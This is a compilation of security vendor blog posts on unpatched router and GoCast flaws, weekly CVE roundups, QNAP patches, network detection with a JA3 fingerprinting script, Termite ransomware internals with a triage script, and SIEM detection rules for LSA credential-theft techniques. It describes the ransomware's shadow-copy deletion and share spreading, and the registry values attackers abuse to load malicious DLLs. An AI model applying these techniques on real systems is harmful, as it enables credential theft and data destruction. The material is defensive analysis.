MC LR Router and GoCast unpatched vulnerabilities

Cisco Talos’ Vulnerability Research team recently discovered two vulnerabilities in MC Technologies LR Router and three vulnerabilities in the GoCast service. 

These vulnerabilities have not been patched at time of this posting. 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

MC Technologies OS command injection vulnerabilities 

Discovered by Matt Wiseman of Cisco Talos. 

The MC-LR Router from MC Technologies supports IPsec and OpenVPN, firewall capabilities, remote management via HTTP and SNMP, and configurable alerting via SMS and email. It is sold in two-port and four-port variants, and some models add transparent serial-to-TCP translation and 1-in/1-out digital I/O. 

Talos recently published two advisories detailing OS command injection vulnerabilities discovered in the MC-LR Router from MC Technologies. TALOS-2024-1953 covers three vulnerabilities (CVE-2024-28025 through CVE-2024-28027), which are reachable through the I/O configuration functionality of the web interface. TALOS-2024-1954 covers one vulnerability (CVE-2024-21786) in the import of uploaded configuration files. All of these vulnerabilities can be triggered with an authenticated HTTP request. 

GoCast authentication and OS command injection vulnerabilities 

Discovered by Edwin Molenaar and Matt Street of Cisco Meraki. 

The GoCast tool provides BGP routing for advertisements from a host; it is commonly used for anycast-based load balancing for infrastructure service instances available in geographically diverse regions.  

The GoCast HTTP API allows the registration and deregistration of apps without requiring authentication, shown in TALOS-2024-1962 (CVE-2024-21855). The lack of authentication can be used to exploit TALOS-2024-1960 (CVE-2024-28892) and TALOS-2024-1961 (CVE-2024-29224), leading to OS command injection and arbitrary command execution. 

Source: Cisco Talos Blog

Cyble’s Weekly Vulnerability Report: Critical Flaws in Major Software Including Progress Software, QNAP, and 7-Zip

Overview

The Cyble Research & Intelligence Labs (CRIL) has released its Weekly Vulnerability Insights Report, highlighting a series of critical vulnerabilities reported between November 27, 2024, and December 3, 2024.

This week’s findings focus on various vulnerabilities that pose risks to organizations, ranging from open-source applications to widely used enterprise software. The analysis includes vulnerabilities that have been actively exploited or are likely to be exploited in the near future, with some already accompanied by proof-of-concept (PoC) exploit code.

One of the most noteworthy vulnerabilities identified in this week’s report is CVE-2024-11680, which impacts ProjectSend, an open-source file-sharing application. This vulnerability is categorized as a critical vulnerability in CISA’s Known Exploited Vulnerabilities (KEV) catalog. The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-11680 along with two other vulnerabilities to its catalog.

Throughout this week, CRIL has extensively analyzed vulnerabilities in products from major vendors like Progress Software, Veeam, Microsoft, and QNAP, as well as open-source software like 7-Zip.

CISA’s KEV Catalog: Active Exploitation and Critical Vulnerabilities

As part of its efforts to inform the public about vulnerabilities that are actively exploited, CISA has added three vulnerabilities to its Known Exploited Vulnerabilities Catalog between November 27 and December 3, 2024.

Among these is CVE-2024-11680, a critical flaw in ProjectSend that involves improper authentication, allowing attackers to bypass security and potentially gain unauthorized access. This vulnerability has been assigned a CVSSv3 score of 9.8, making it a high-priority issue for organizations using the software.

Additionally, CVE-2024-11667, a path traversal vulnerability in Zyxel firewalls, also made it to the KEV catalog. Although not as critical as CVE-2024-11680, this vulnerability is still high-risk, affecting multiple models of Zyxel Firewalls with a CVSSv3 score of 7.5. This issue could allow attackers to access sensitive files on vulnerable systems.

Furthermore, CVE-2023-45727, an XML External Entity (XXE) vulnerability in North Grid’s Proself software, was included as well. Exploitation of this vulnerability can allow attackers to launch XXE attacks remotely, exposing systems to potential data breaches.

Major Vulnerabilities Identified

Several other vulnerabilities have been identified as critical threats in this week’s report. Among them:

  1. CVE-2024-8785 – A Remote Code Execution (RCE) vulnerability in WhatsUp Gold, a network monitoring software by Progress Software Corporation. This vulnerability allows unauthenticated remote attackers to exploit the NmAPI.exe service to manipulate the Windows registry, potentially resulting in system compromise. With the availability of PoC exploit code, the risk of this vulnerability being weaponized is particularly high.
  2. CVE-2024-42448 and CVE-2024-42449 – Both vulnerabilities affect the Veeam Service Provider Console (VSPC), a cloud-based platform used for managing and monitoring data protection services. These vulnerabilities could allow for Remote Code Execution (RCE) and the exposure of sensitive information like NTLM hashes. Veeam has released patches, but organizations are urged to patch their systems immediately to prevent exploitation.
  3. CVE-2024-11477 – An RCE vulnerability in the popular file archiver 7-Zip. This flaw arises from Zstandard Decompression in versions prior to 24.07 and could be exploited in email-based phishing campaigns that use malicious compressed files as delivery mechanisms. Given the high use of 7-Zip in both personal and organizational settings, this vulnerability is a major concern.
  4. CVE-2024-49019 – A high-severity elevation of privilege vulnerability in Microsoft’s Active Directory Certificate Services. This flaw allows attackers to gain elevated permissions by exploiting misconfigurations in certificate templates. CVE-2024-49019 affects millions of Windows-based systems, and with exploit codes already circulating, it poses a significant risk.
  5. CVE-2024-38077 – A critical vulnerability affecting the Windows Remote Desktop Licensing Service, which allows Remote Code Execution (RCE). This vulnerability is particularly dangerous as it impacts multiple versions of Windows, making it a prime target for attackers.

Online Threats on Underground Forums

One of the more concerning findings in the Weekly Vulnerability Report is the presence of active discussions and exploit sharing on underground forums and Telegram channels. These forums are often frequented by cybercriminals who share PoC exploit codes for various vulnerabilities. This week, researchers from CRIL tracked several discussions related to the following vulnerabilities:

  • CVE-2024-44285 – A use-after-free vulnerability found in Apple’s operating systems, including iOS, iPadOS, and watchOS. Exploiting this flaw could lead to unexpected termination of the system or even kernel memory corruption.
  • CVE-2024-11320 – An arbitrary code execution (RCE) vulnerability affecting Pandora FMS. This vulnerability can be exploited via the LDAP authentication mechanism, potentially giving attackers full access to vulnerable systems.
  • CVE-2024-44308 – A critical vulnerability in JavaScriptCore, part of the WebKit engine used by Apple’s Safari browser. This flaw could lead to RCE when users visit malicious websites.
  • CVE-2024-0012 – An authentication bypass vulnerability in Palo Alto Networks’ PAN-OS, affecting several versions of the software. This flaw allows attackers to bypass authentication and gain administrative privileges, providing them with full control over affected devices.

Recommendations and Mitigations

Following these vulnerabilities, CRIL offers several key recommendations to help organizations mitigate potential security risks:

  1. Organizations should ensure they are applying the latest patches released by vendors to address vulnerabilities like CVE-2024-11680 and others identified in this report. Patching critical vulnerabilities immediately can prevent attacks from exploiting these weaknesses.
  2. A comprehensive patch management process is essential. This includes testing, deployment, and verification of patches to ensure that systems remain secure.
  3. Critical systems should be isolated from less secure areas of the network to reduce exposure to potential attacks. Using firewalls and access control measures can help limit the impact of a breach.
  4. Organizations should implement monitoring systems such as SIEM (Security Information and Event Management) to detect suspicious activities across their networks.
  5. Regular training on security best practices, particularly for dealing with phishing emails and malicious attachments, can help reduce the risk of exploitation through social engineering.

Conclusion

The Weekly Vulnerability Report from Cyble Research & Intelligence Labs provides essential insights into the vulnerabilities impacting critical systems and software. With high-risk vulnerabilities such as CVE-2024-11680, CVE-2024-8785, and CVE-2024-49019 in play, it is crucial for organizations to stay proactive in applying patches, monitoring for potential attacks, and reinforcing their overall security posture.

With PoC exploit code already circulating for many of these vulnerabilities, the window of opportunity for attackers to exploit these flaws is rapidly closing, making immediate action imperative. By following the best practices and recommendations provided in this report, organizations can better protect themselves.

Source: Cyble Blog

Comprehensive overview of network detection & response capabilities and uses | Kaspersky official blog

Why do even large companies that have invested heavily in their cyberdefense still fall victim to cyberattacks? Most often, it’s a matter of an outdated approach to security. Security teams may deploy dozens of tools, but lack visibility within their own networks, which nowadays include not only the usual physical segments, but cloud environments as well. Hackers often exploit stolen credentials, operate through compromised contractors, and try to use malware as rarely as possible — preferring to exploit legitimate software and dual-purpose applications. That’s why the security tools usually used to protect a company’s endpoints may not be effective enough against well-disguised cyberattacks.

In a recent survey, 44% of CISOs reported missing a data breach, with 84% attributing the issue to an inability to analyze traffic, particularly encrypted traffic. This is where network detection and response (NDR) systems come into play. They offer comprehensive traffic analysis, including internal traffic — significantly enhancing security capabilities. In the Kaspersky product range, NDR functionality is implemented as part of its Kaspersky Anti Targeted Attack Platform (KATA).

Outdated security tools aren’t enough

If there was one word to describe the priorities of today’s attackers, it would be “stealth”. Whether it’s espionage-focused APTs, ransomware groups, or any other attacks targeting a specific organization, adversaries go to great lengths to avoid detection, and complicate post-incident analysis. Our incident response report illustrates this vividly. Attackers exploit legitimate employee or contractor credentials, leverage admin tools already in use within the system (a tactic known as “living off the land”), and exploit vulnerabilities to perform actions from privileged user accounts, processes, or devices. Moreover, edge devices, such as proxy servers and firewalls, are increasingly being used as attack footholds.

How do cybersecurity teams respond to this? If a company’s threat detection approach was designed several years ago, its defenders might simply lack the tools to detect such activity in a timely manner:

  • Firewalls. In their traditional form, they only protect the organization’s perimeter, and don’t assist in detecting suspicious network activity inside it (such as attackers taking over additional computers).
  • Intrusion detection and prevention systems (IDS/IPS). The capabilities of classic IDSs for detecting activity over encrypted channels are very limited, and their typical location between network segments impedes detection of lateral movement.
  • Antivirus and endpoint protection systems. These tools are difficult to use for detecting activity conducted entirely with legitimate tools in manual mode. Moreover, organizations always have routers, IoT devices, or network peripherals where it’s not possible to deploy such protection systems.

What is network detection and response?

NDR systems provide detailed monitoring of an organization’s traffic and apply various rules and algorithms to detect anomalous activity. They also include tools for rapid incident response.

The key difference to firewalls is the monitoring of all types of traffic flowing in various directions. Thus, not only communications between a network and the internet (north-south) are being analyzed, but data exchange between hosts within a corporate network (east-west) as well. Communications between systems in external networks and corporate cloud resources, as well as between cloud resources themselves, are not left unattended either. This makes NDR effective in various infrastructures: on-premises, cloud, and hybrid.

The key difference to classic IDS/IPS is the use of behavioral analysis mechanisms alongside signature analysis.

Besides connection analysis, an NDR solution keeps traffic in its “raw” form, and provides a whole range of technologies for analysis of such “snapshots” of data exchange; NDR can analyze many parameters of traffic (including metadata), going beyond simple “address-host-protocol” dependencies. For example, using JAx fingerprints (JA3/JA4), NDR can identify the nature even of encrypted SSL/TLS connections, and detect malicious traffic without needing to decrypt it.
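As an added illustration of the fingerprinting mentioned above (example code written for this page, not Kaspersky’s or KATA’s implementation), the following computes a JA3 fingerprint from a TLS ClientHello: it extracts the version, cipher suites, extensions, curves and point formats, drops GREASE values, and hashes the result. The ClientHello bytes are constructed by the build_client_hello() helper rather than captured from a real client.

```python
"""JA3 fingerprinting of a TLS ClientHello (added example, not from the
Kaspersky post). It shows the handshake metadata an NDR sensor can read
from an encrypted session without decrypting it. The ClientHello bytes
are constructed by build_client_hello(), not captured from a real client."""
import hashlib
import struct

# GREASE values (RFC 8701) change per connection and are dropped from JA3,
# otherwise one client would hash differently on every handshake.
GREASE = {0x0A0A + 0x1010 * i for i in range(16)}


def _u8(v):
    return struct.pack("!B", v)


def _u16(v):
    return struct.pack("!H", v)


def build_client_hello(version, ciphers, extensions, curves, point_formats):
    """Assemble a minimal TLS record carrying a ClientHello (constructed input)."""
    body = _u16(version) + b"\x00" * 32                       # version + random
    body += _u8(0)                                            # empty session id
    body += _u16(2 * len(ciphers)) + b"".join(_u16(c) for c in ciphers)
    body += _u8(1) + _u8(0)                                   # null compression
    ext_blob = b""
    for ext_type in extensions:
        if ext_type == 0x000A:                                # supported_groups
            data = _u16(2 * len(curves)) + b"".join(_u16(c) for c in curves)
        elif ext_type == 0x000B:                              # ec_point_formats
            data = _u8(len(point_formats)) + bytes(point_formats)
        else:
            data = b""
        ext_blob += _u16(ext_type) + _u16(len(data)) + data
    body += _u16(len(ext_blob)) + ext_blob
    handshake = b"\x01" + struct.pack("!I", len(body))[1:] + body   # type 1 = ClientHello
    return b"\x16\x03\x01" + _u16(len(handshake)) + handshake         # TLS record


def _u16_list(buf, start, length):
    """Decode `length` bytes of big-endian uint16 values starting at `start`."""
    return [struct.unpack("!H", buf[i:i + 2])[0] for i in range(start, start + length, 2)]


def ja3_from_record(record):
    """Parse the ClientHello and return (ja3_string, ja3_md5_hex)."""
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a TLS handshake record carrying a ClientHello")
    p = 9                                      # record header (5) + handshake header (4)
    version = struct.unpack("!H", record[p:p + 2])[0]
    p += 2 + 32                                # client_version, random
    p += 1 + record[p]                         # session id (length-prefixed)
    cs_len = struct.unpack("!H", record[p:p + 2])[0]
    ciphers = _u16_list(record, p + 2, cs_len)
    p += 2 + cs_len
    p += 1 + record[p]                         # compression methods
    ext_total = struct.unpack("!H", record[p:p + 2])[0]
    p += 2
    end = p + ext_total
    exts, curves, pfs = [], [], []
    while p < end:
        et, el = struct.unpack("!HH", record[p:p + 4])
        data = record[p + 4:p + 4 + el]
        p += 4 + el
        exts.append(et)
        if et == 0x000A:
            curves = _u16_list(data, 2, struct.unpack("!H", data[:2])[0])
        elif et == 0x000B:
            pfs = list(data[1:1 + data[0]])

    def keep(values):
        return [v for v in values if v not in GREASE]

    ja3 = ",".join([
        str(version),
        "-".join(map(str, keep(ciphers))),
        "-".join(map(str, keep(exts))),
        "-".join(map(str, keep(curves))),
        "-".join(map(str, pfs)),
    ])
    return ja3, hashlib.md5(ja3.encode()).hexdigest()


# Constructed ClientHello: TLS 1.2 with one GREASE cipher, one GREASE
# extension and one GREASE curve mixed in, as Chromium-style clients do.
SAMPLE = build_client_hello(
    version=0x0303,
    ciphers=[0x2A2A, 0x1301, 0xC02B, 0xC02F],
    extensions=[0x0A0A, 0x0000, 0x000A, 0x000B, 0x0010],
    curves=[0x1A1A, 0x001D, 0x0017],
    point_formats=[0],
)

if __name__ == "__main__":
    ja3_string, ja3_hash = ja3_from_record(SAMPLE)
    print(ja3_string)   # 771,4865-49195-49199,0-10-11-16,29-23,0
    print(ja3_hash)
```

The same JA3 string is produced no matter which GREASE values the client picked, which is what makes the hash usable as a stable client identifier.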

Benefits of NDR for IT and security teams

Early threat detection. Even the initial steps of attackers — whether it’s brute-forcing passwords or exploiting vulnerabilities in publicly accessible applications — leave traces that NDR tools can detect. NDR, having “presence” not only on the edges of a network, but at its endpoints as well, is also well-suited to detecting lateral movement within the network, manipulation of authentication tokens, tunneling, reverse shells, and other common attack techniques that involve network interactions.

Accelerated incident investigation. NDR tools allow for both broad and deep analysis of suspicious activity. Network interaction diagrams show where attackers moved and where their activity originated from, while access to raw traffic allows for the reconstruction of the attacker’s actions and the creation of detection rules for future searches.

A systematic approach to the big picture of an attack. NDR works with the tactics, techniques, and procedures of the attack — systematized according to a popular framework such as MITRE ATT&CK. Solutions of this class usually allow a security team to easily classify the detected indicators and, as a result, better understand the big picture of the attack, figure out the stage it’s at, and decide how the attack can be stopped as effectively as possible.

Detection of internal threats, misconfigurations, and shadow IT. The “behavioral” approach to traffic allows NDR to address preventive tasks as well. Various security policy violations, such as using unauthorized applications on personal devices, connecting additional devices to the company infrastructure, sharing passwords, accessing information not required for work tasks, using outdated software versions, and running server software without properly configured encryption and authentication, can be identified early and stopped.

Supply chain threat detection. Monitoring the traffic of legitimate applications may reveal undeclared functionality, such as unauthorized telemetry transmission to the manufacturer or attempts to deliver trojanized updates.

Automated response. The “R” in NDR stands for response actions such as isolating hosts with suspicious activity, tightening network zone interaction policies, and blocking high-risk protocols or malicious external hosts. Depending on the circumstances, the response can be either manual or automatic, triggered by the “if-then” presets.

NDR, EDR, XDR, and NTA

IT management and executives often ask tricky questions about how various *DR solutions differ from each other and why they’re all needed at the same time.

NTA (network traffic analysis) systems are the foundation from which NDR evolved. They were designed to collect and analyze all the traffic of a company (hence the name). However, practical implementation revealed the broader potential of this technology — that is, it could be used for rapid incident response. Response capabilities, including automation, are NDR’s primary distinction.

EDR (Endpoint Detection & Response) systems analyze cyberthreats on specific devices within the network (endpoints). While NDR provides a deep analysis of devices’ interactions and communication within the organization, EDR offers an equally detailed picture of the activity on individual devices. These systems complement each other, and only together do they provide a complete view of what’s happening in the organization and the tools needed for detection and response.

XDR (eXtended Detection & Response) systems take a holistic approach to threat detection and response by aggregating and correlating data from various sources, including endpoints, physical and cloud infrastructures, network devices, and more. This enables defenders to see a comprehensive overview of network activity, combine events from different sources into single alerts, apply advanced analytics to them, and simplify response actions. Different vendors put different spins on XDR: some offer XDR as a product that includes both EDR and NDR functionalities, while for others it may only support integration with these external tools.

Kaspersky’s approach: integrating NDR into the security ecosystem

Implementing NDR implies that an organization has already achieved a high level of cybersecurity maturity, with established monitoring and response practices, as well as tools for information exchange between systems, ensuring correlation and enrichment of data from various sources. This is why, in Kaspersky’s product range, the NDR module enhances the capabilities of the Kaspersky Anti Targeted Attack Platform (KATA). The basic version of KATA includes mechanisms such as SSL/TLS connection fingerprint analysis, north-south traffic attack detection, selective traffic capture for suspicious connections, and basic response functions.

The KATA NDR Enhanced version includes all the NDR capabilities described above, including deep analysis and full storage of traffic, intra-network connection monitoring, and automated advanced response functions.

The top-tier version, KATA Ultra, combines expert EDR capabilities with full NDR functions, offering a comprehensive, single-vendor XDR solution.

Source: Kaspersky official blog

QNAP NAS Vulnerabilities Exposed: What You Need to Know to Stay Secure

Overview

QNAP NAS systems, a trusted choice for personal and enterprise data storage, have recently been flagged for multiple critical vulnerabilities.

Multiple vulnerabilities have been identified in QNAP’s operating systems, leaving users exposed to a variety of potential threats, including remote code execution, denial of service (DoS), data manipulation, sensitive information disclosure, and security restriction bypass. If exploited, these vulnerabilities could compromise not just the integrity of the systems but also the valuable data they house.

With businesses and individuals relying heavily on QNAP NAS for secure storage, these vulnerabilities highlight the growing need for strong security measures and proactive updates. This blog dives deep into the technical aspects of the vulnerabilities, their impact, and how users can protect their systems.

Impact of the Vulnerabilities

The reported vulnerabilities pose significant threats to the security and stability of QNAP NAS systems. Here’s a breakdown of the potential impacts:

  • Remote Code Execution: allows attackers to execute arbitrary code on the system remotely.
  • Denial of Service (DoS): overloads the system, making it inaccessible to legitimate users.
  • Information Disclosure: exposes sensitive information stored on the NAS to unauthorized users.
  • Data Manipulation: enables attackers to alter, delete, or corrupt critical data.
  • Security Restriction Bypass: allows attackers to circumvent security controls, leading to unauthorized access.

Systems and Technologies Affected

The vulnerabilities affect specific versions of QNAP’s operating systems, including QTS and QuTS hero. Below is the list of impacted systems:

  • QTS: versions 5.1.x and 5.2.x
  • QuTS hero: versions h5.1.x and h5.2.x

Details of the Vulnerabilities

These vulnerabilities, identified by their Common Vulnerabilities and Exposures (CVE) identifiers, target various system components. A closer look at each vulnerability:

  • CVE-2024-48859 (Improper Authentication): could allow remote attackers to compromise the system’s security.
  • CVE-2024-48865 (Improper Certificate Validation): enables attackers with local network access to compromise security.
  • CVE-2024-48866 (Improper URL Encoding Handling): causes the system to enter an unexpected state.
  • CVE-2024-48867 and CVE-2024-48868 (CRLF Injection): permit attackers to modify application data.
  • CVE-2024-50393 (Command Injection): allows remote attackers to execute arbitrary commands on the system.
  • CVE-2024-50402 and CVE-2024-50403 (Externally-Controlled Format String): enable attackers with administrator privileges to access secret data or modify system memory.

These vulnerabilities highlight a range of attack vectors, from improper input validation to poorly managed authentication mechanisms.

Mitigation and Fixes

QNAP has released patches addressing these vulnerabilities in updated versions of its operating systems. Users are strongly encouraged to update to the fixed versions as shown below:

  • QTS 5.1.x: fixed in QTS 5.1.9.2954 build 20241120 and later (released November 20, 2024).
  • QTS 5.2.x: fixed in QTS 5.2.2.2950 build 20241114 and later (released November 14, 2024).
  • QuTS hero h5.1.x: fixed in QuTS hero h5.1.9.2954 build 20241120 and later (released November 20, 2024).
  • QuTS hero h5.2.x: fixed in QuTS hero h5.2.2.2952 build 20241116 and later (released November 16, 2024).

How to Update

To ensure your QNAP NAS system is secure, follow these steps to update your firmware:

  1. Login: access QTS or QuTS hero as an administrator.
  2. Navigate to Firmware Update: go to Control Panel > System > Firmware Update.
  3. Check for updates: under the Live Update tab, click Check for Update. The system will automatically download and install the latest update.
  4. Manual update (optional): visit the QNAP Download Center, download the latest firmware, and install it manually.

Why These Vulnerabilities Matter

QNAP NAS devices are widely used in personal and enterprise environments. Sensitive data such as backups, financial records, and confidential information are often stored on these systems, and a breach can lead to catastrophic consequences, including financial losses and reputational damage.

Key Lessons for Users

  1. Regular Updates: Always ensure your NAS firmware is up-to-date to protect against the latest threats.
  2. Vulnerability Awareness: Familiarize yourself with vulnerabilities affecting your devices to act proactively.
  3. Network Security: To complement device security, implement additional network-level defenses, such as firewalls and intrusion detection systems.

Best Practices for Securing QNAP NAS

  • Enable 2-Factor Authentication: Adds an extra layer of security by requiring a secondary verification method.
  • Limit External Access: Restrict remote access to the NAS device to only trusted IP addresses.
  • Regular Backups: Ensure all critical data is backed up in a secure and separate location.
  • Monitor for Anomalies: Use QNAP’s built-in monitoring tools to detect unusual activities.
  • Use Strong Passwords: Replace default credentials with complex and unique passwords to prevent unauthorized access.

Conclusion

The discovery of these vulnerabilities points out the importance of maintaining strong cybersecurity practices for critical systems like QNAP NAS. With the provided fixes and recommendations, users can safeguard their systems against potential exploitation.

Stay vigilant, update promptly, and prioritize security to ensure the integrity of your data and systems.

Sources:

  • https://www.hkcert.org/security-bulletin/qnap-nas-multiple-vulnerabilities_20241209
  • https://www.qnap.com/en/security-advisory/qsa-24-49

Source: Cyble Blog

A Technical Look at the New ‘Termite’ Ransomware that Hit Blue Yonder

The ransomware attack that hit supply chain management platform Blue Yonder and its customers last month was the work of a new ransomware group called “Termite.”

Cyble Research and Intelligence Labs (CRIL) researchers have examined a Termite ransomware binary and determined that Termite is essentially a rebranding of the notorious Babuk ransomware. The Termite leak site claims seven victims so far (geographic distribution below).

We’ll cover the technical details of the new Termite ransomware strain, which was first identified by PCrisk, along with MITRE ATT&CK techniques, indicators of compromise (IoCs) and recommendations.

Technical Details of Termite Ransomware

Upon execution, the ransomware invokes the SetProcessShutdownParameters(0, 0) API to ensure that its process is one of the last to be terminated during system shutdown. This tactic is used to maximize the time available for the ransomware to complete its encryption process.

The ransomware then attempts to terminate services on the victim’s machine to prevent interruptions during the encryption process. It uses the OpenSCManagerA() API to establish a connection with the Service Control Manager, granting access to the service control manager database (image below).

[Figure: Enumerating services]

After gaining access, the ransomware enumerates the services on the victim’s machine to retrieve their names. It specifically looks for services such as veeam, vmms, memtas and others, and terminates them if they are found to be actively running.

The ransomware enumerates running processes using the CreateToolhelp32Snapshot(), Process32FirstW(), and Process32NextW() APIs. It checks process names such as sql.exe, oracle.exe, firefox.exe and others and terminates them if they are actively running.

[Figure: Process termination]

After that, the ransomware launches the vssadmin.exe process to delete all Shadow Copies, as shown in the below figure. This action is performed to prevent system recovery after the files have been encrypted.

[Figure: Deleting shadow copies]

The ransomware also uses the SHEmptyRecycleBinA() API to delete all items from the Recycle Bin, ensuring that no deleted files can be restored after encryption. It then retrieves system information using the GetSystemInfo() API, which collects details like the number of processors, as shown in the below figure.

[Figure: Retrieving system information]

The ransomware then creates a separate thread for each detected CPU, generates ransom notes named “How To Restore Your Files.txt”, and encrypts files on the victim’s machine.

It avoids encrypting certain system folders such as AppData, Boot, Windows, Windows.old etc. Additionally, it specifically excludes system files such as autorun.inf, boot.ini, bootfont.bin etc., as well as file extensions like .exe, .dll, and .termite from the encryption process to ensure that essential system functions remain intact.

Similar to Babuk ransomware, Termite appends the signature “choung dong looks like hot dog” at the end of the encrypted file.

[Figure: Encryption marker]

The figure below shows the ransom note dropped by the ransomware, titled “How To Restore Your Files.txt,” which instructs victims to visit the onion site for additional information.

[Figure: Ransom note]

After dropping the ransom notes, the malware encrypts the files on the victim’s machine and appends the “.termite” extension, as shown in the figure below.

[Figure: Encrypted files]

The Termite ransomware can also spread through network shares and paths of the infected machine, as shown below.

[Figure: Spreading through network shares and paths]

If the command-line argument is “shares,” the ransomware uses the NetShareEnum() API to locate network shares and retrieve information about each shared resource on the server. It then checks for the $ADMIN share and begins encrypting the files. If the command-line argument is “paths,” the ransomware calls the GetDriveTypeW() API to identify network drives connected to the infected machine, and once located, it starts encrypting the files. If neither “-paths” nor “-shares” are provided, and the mutex named “DoYouWantToHaveSexWithCuongDong” is not found on the infected machine, the ransomware recursively traverses all local drives and encrypts the files.
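A triage script built on the indicators described above (an added example for this page, not Cyble’s tooling): it walks a directory tree, prunes the folders the ransomware excludes, and classifies files by the “.termite” extension and the trailing marker string so responders can size the damage and spot partially processed files. The directory tree in demo() is constructed.

```python
"""Post-incident triage for Termite encryption artefacts (added example,
not from the Cyble write-up). It uses the indicators the analysis gives:
the ".termite" extension, the trailer "choung dong looks like hot dog",
the ransom note name and the folders the ransomware skips. demo() builds
a constructed directory tree so the scan can be run offline."""
import os
import tempfile

MARKER = b"choung dong looks like hot dog"
EXTENSION = ".termite"
NOTE_NAME = "How To Restore Your Files.txt"
# Folders the ransomware leaves untouched; pruning them keeps the scan on
# user data and avoids wasting time on system paths it never encrypts.
SKIP_DIRS = {"appdata", "boot", "windows", "windows.old"}


def has_marker(path):
    """True if the file ends with the Babuk/Termite trailer string."""
    try:
        with open(path, "rb") as fh:
            fh.seek(0, os.SEEK_END)
            size = fh.tell()
            if size < len(MARKER):
                return False
            fh.seek(size - len(MARKER))
            return fh.read(len(MARKER)) == MARKER
    except OSError:
        return False


def scan_tree(root):
    """Walk root and classify files; returns a dict of category -> list of paths."""
    found = {"encrypted": [], "marker_only": [], "renamed_only": [], "ransom_notes": []}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d.lower() not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            renamed = name.lower().endswith(EXTENSION)
            if name == NOTE_NAME:
                found["ransom_notes"].append(path)
            elif renamed and has_marker(path):
                found["encrypted"].append(path)
            elif has_marker(path):
                # Trailer written but extension not yet applied: encryption
                # may have been interrupted mid-run, worth a manual look.
                found["marker_only"].append(path)
            elif renamed:
                found["renamed_only"].append(path)
    return found


def demo():
    """Build a constructed tree, scan it and return the count per category."""
    with tempfile.TemporaryDirectory() as root:
        docs = os.path.join(root, "Users", "alice", "Documents")
        sys32 = os.path.join(root, "Windows", "System32")
        os.makedirs(docs)
        os.makedirs(sys32)
        samples = {
            os.path.join(docs, "report.docx.termite"): b"\x00" * 64 + MARKER,
            os.path.join(docs, "budget.xlsx"): b"\x00" * 64 + MARKER,   # not renamed
            os.path.join(docs, "draft.txt.termite"): b"\x00" * 64,       # no trailer
            os.path.join(docs, "notes.txt"): b"plain text, untouched",
            os.path.join(docs, NOTE_NAME): b"constructed ransom note",
            os.path.join(sys32, "cmd.exe.termite"): MARKER,              # in a skipped folder
        }
        for path, content in samples.items():
            with open(path, "wb") as fh:
                fh.write(content)
        return {category: len(paths) for category, paths in scan_tree(root).items()}


if __name__ == "__main__":
    print(demo())   # {'encrypted': 1, 'marker_only': 1, 'renamed_only': 1, 'ransom_notes': 1}
```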

Conclusion

Termite ransomware represents a new and growing threat in the cyber landscape, leveraging advanced tactics such as double extortion to maximize its impact on victims. By targeting businesses and demanding substantial ransoms, it not only disrupts operations but also exposes organizations to significant financial, legal, and reputational risks. The emergence of Termite underscores the critical need for robust cybersecurity measures, proactive threat intelligence, and incident response strategies to counter the evolving tactics of ransomware groups.

Recommendations

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices below:

Safety Measures to Prevent Ransomware Attacks

  • Do not open untrusted links and email attachments without first verifying their authenticity.
  • Conduct regular backup practices and keep those backups offline or in a separate network.
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices wherever possible and pragmatic.
  • Use a reputable antivirus and Internet security software package on your connected devices, including PC, laptop, and mobile. 

MITRE ATT&CK® Techniques

  • Execution: T1204.002 (User Execution). The user executes the ransomware file.
  • Defense Evasion: T1070.004 (Indicator Removal: File Deletion). The ransomware deletes itself after execution.
  • Discovery: T1083 (File and Directory Discovery). The ransomware enumerates folders for file encryption and file deletion.
  • Discovery: T1135 (Network Share Discovery). Targets network shares and paths.
  • Impact: T1486 (Data Encrypted for Impact). The ransomware encrypts the data for extortion.
  • Impact: T1490 (Inhibit System Recovery). Disables automatic Windows recovery.

IOC

  • f0ec54b9dc2e64c214e92b521933cee172283ff5c942cf84fae4ec5b03abab55 (SHA-256): Termite Ransomware

The post A Technical Look at the New ‘Termite’ Ransomware that Hit Blue Yonder appeared first on Cyble.


Kaspersky SIEM improvements in Q4 2024 | Kaspersky official blog

In attacks on infrastructure of various companies, cybercriminals are increasingly resorting to manipulating modules that interact with the Local Security Authority (LSA) process. This enables them to steal user credentials, establish persistence in the system, elevate privileges, or extend the attack to other systems within the target company. Therefore, for the latest quarterly update of our SIEM system, the Kaspersky Unified Monitoring and Analysis Platform, we’ve added rules designed to detect such attempts. In terms of the MITRE ATT&CK classification, the new rules can detect techniques T1547.002, T1547.005 and T1556.002.

What are techniques T1547.002, T1547.005 and T1556.002?

Both T1547 sub-techniques mentioned above abuse the LSA process to load attacker-controlled modules. Sub-technique 002 registers a malicious dynamic-link library (DLL) as a Windows authentication package, while sub-technique 005 registers one as a security support provider (SSP) package. Once loaded, the module runs inside the LSA process and can read its memory, which holds critical data such as user credentials.

Technique T1556.002 describes an attacker registering a malicious password filter DLL in the system. Password filters are the mechanism Windows uses to enforce password policy: when a user sets or changes a password, the LSA process hands the candidate password to every registered filter for checking, and it must do so in plain text, i.e., unencrypted. A malicious filter therefore captures every password at the moment it is set or changed.

All three techniques involve placing the malicious library in C:\Windows\System32 and registering it under the registry key HKLM\SYSTEM\CurrentControlSet\Control\Lsa, in the multi-string value that the corresponding LSA component reads when it starts: Authentication Packages for T1547.002, Security Packages for T1547.005, and Notification Packages for T1556.002.

How our SIEM counters techniques T1547.002, T1547.005 and T1556.002

To counter these techniques, the Kaspersky Unified Monitoring and Analysis Platform will be updated with rules R154_02–R154_10, which detect, among other things, the following events:

  • Loading of suspicious authentication packages, password filter (notification) packages and security support provider modules, using security events 4610, 4614 and 4622 respectively.
  • Commands executed through cmd.exe or powershell.exe that modify the Lsa registry key or its Authentication Packages, Notification Packages and Security Packages values.
  • Changes to the Lsa registry key (registry value modification event 4657, which is only generated when auditing is enabled on that key) that could register a malicious library.

Other improvements in the Kaspersky Unified Monitoring and Analysis Platform update

In this update, we’re also introducing rule R999_99, which detects changes in Active Directory accounts’ critical attributes, such as scriptPath and msTSInitialProgram, which enable various actions to be performed upon login.

